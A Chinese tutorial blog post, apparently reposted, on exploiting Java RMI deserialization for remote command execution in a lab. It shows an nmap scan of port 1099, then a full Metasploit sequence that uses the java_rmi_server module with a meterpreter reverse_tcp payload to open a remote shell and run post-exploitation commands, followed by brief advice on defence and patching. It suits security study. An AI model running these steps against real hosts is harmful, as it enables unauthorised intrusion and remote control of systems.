当前位置:网站首页>6-17漏洞利用-反序列化远程命令执行漏洞
6-17漏洞利用-反序列化远程命令执行漏洞
2022-07-25 21:48:00 【山兔1】

Java rmi介绍
Java RMI 指的是远程方法调用(Remote Method Invocation)。它是一种机制,能够让在某个java虚拟机上的对象调用另一个java虚拟机中的对象上的方法。
RMI是J2SE的一部分,能够让程序员开发出基于JAVA的分布式应用。一个rmi对象是一个远程JAVA对象,可以从另一个JAVA虚拟机上(甚至跨过网络)调用它的方法,可以像调用本地JAVA对象的方法一样调用远程对象的方法,是分布在不同的JVM中的对象的外表和行为都像本地对象一样。

我们这边有JVM1和JVM2,JVM1和JVM2可以进行来回的交互,JVM1可以调用JVM2上的方法,JVM2可以调用JVM1上的方法,通过RMI技术实现
对于任何一个以对象为参数的RMI接口,你都可以发一个自己构建的对象,迫使服务器端将这个对象按任何一个存在于class path中的可序列化类来反序列化。
RMI的传输100%基于反序列化。首先他要把字符串转化为对象,对象在经过反序列化转化为字符串,从而达到传输的效果
探测目标rmi
使用Nmap -p 1099 -sV IP地址探测目标的版本信息。
nmap -sV -p 1099 192.168.1.106

可以看到这里探测出对应的版本信息以及运行的服务,服务信息localhost
在实际情况下,肯定要使用漏洞扫描器,进行漏洞探测,但是我们可以直接将POC进行利用
rmi远程命令执行利用
使用Metasploit对rmi RCE漏洞利用。
实际上就是在metasploit中的模块,将我们系统的命令进行序列化,传输到rmi,在传递的过程中,rmi将传递的内容,转换为系统的命令,整个过程是因为metasploit构造了一个特殊的对象,在rmi server当中进行了执行,我们这里连接了server进行了一个对话,我们使用的模块是exploit
msfconsole
use exploit/multi/misc/java_rmi_server
show options
set rhosts 192.168.1.105
ifconfig
show payloads
set payload java/meterpreter/reverse_tcp
show options
set lhosts 192.168.1.103
exploit



sessions -l
sessions -i 1

?
//查看可以使用的命令

sysinfo

查看当前的系统信息
ps
//查看当前的进程信息

当然,我们也可以进行其它操作,使用meteasploit进行后渗透测试,上传下载,都可以
防御修复
1、存在反序列化传输。–特别注意,看是否可以利用反序列化漏洞执行系统命令
2、存在有缺陷的第三方库如commons-collections 及时升级库,或者改用其它的库,来代替这个存在缺陷的第三方库,这是我们需要做的。
在进行权限设置时,一定要注意,我们java的rmi进程,要具备执行我们系统的权限,或者只能执行一部分,在一定程度上,会限制系统命令的执行,达到防御的效果
边栏推荐
- Detailed explanation of JVM memory model and structure (five model diagrams)
- PHP zero time task, PHP laravel time task schedule [dry goods]
- [interview: concurrent Part 24: multithreading: comprehensive exercise] sequence control
- 2022最新软件测试八股文,能不能拿心仪Offer就看你背得怎样了
- 如何快速搭建图片服务器[通俗易懂]
- 少儿编程 电子学会图形化编程等级考试Scratch一级真题解析(判断题)2022年6月
- 选择的能力
- C#Socket
- 2022 love analysis ― bank digitalization practice report
- How will Web3 change the future of people?
猜你喜欢

【Redis底层解析】字符串类型

函数栈帧的创建和销毁

Share | intelligent fire emergency management platform solution (PDF attached)

IJCAI2022开会了! 微软等《领域泛化Domain Generalization》教程

Create EDA - why should I learn EDA

Detailed explanation of JVM memory model and structure (five model diagrams)

Oxford University: many common insomnia drugs lack long-term safety data
![[MAIXPY]kpu: load error:2005, ERR_READ_FILE: read file failed问题解决](/img/0b/da67b5a361a2cdfaf81568d34cf5f7.png)
[MAIXPY]kpu: load error:2005, ERR_READ_FILE: read file failed问题解决
![[hand tear STL] BitSet (bitmap), bloom filter](/img/bc/a6e3c2ccce478460a2742852eee9cf.png)
[hand tear STL] BitSet (bitmap), bloom filter

Origen foundation officially launched $ogy stacking, leading a new round of ecological benefits
随机推荐
【饭谈】那些看似为公司着想,实际却让人无法理解的事(二:面试时的软素质“眼缘”)
mysql8.0 mha实现高可用《mha》
PE format: analyze and implement IATHOOK
How to use RS485 half duplex chip correctly
Lichuang EDA -- creation of devices 01 resistance (II)
How to choose sentinel vs. hystrix current limiting?
Ijcai2022 meeting! Microsoft and other tutorials on domain generalization
[interview: concurrent Part 24: multithreading: comprehensive exercise] sequence control
Pyqt5 use pyqtgraph to draw multiple y-value scatter plots
【面试:并发篇24:多线程:综合练习】顺序控制
[leetcode ladder] linked list · 876 find the middle node of the linked list
Isn't it too much to play Gobang in idea?
立创EDA——器件的创建01-电阻(二)
Guys, how can Flink SQL submit tasks in per job mode?
【leetcode天梯】链表 · 876 查找链表中间结点
Vivo official website app full model UI adaptation scheme
Basic knowledge in the project
dovecot 设置邮箱quota
MPI learning notes (II): two implementation methods of matrix multiplication
[51Nod1676 无向图同构]无向图哈希[通俗易懂]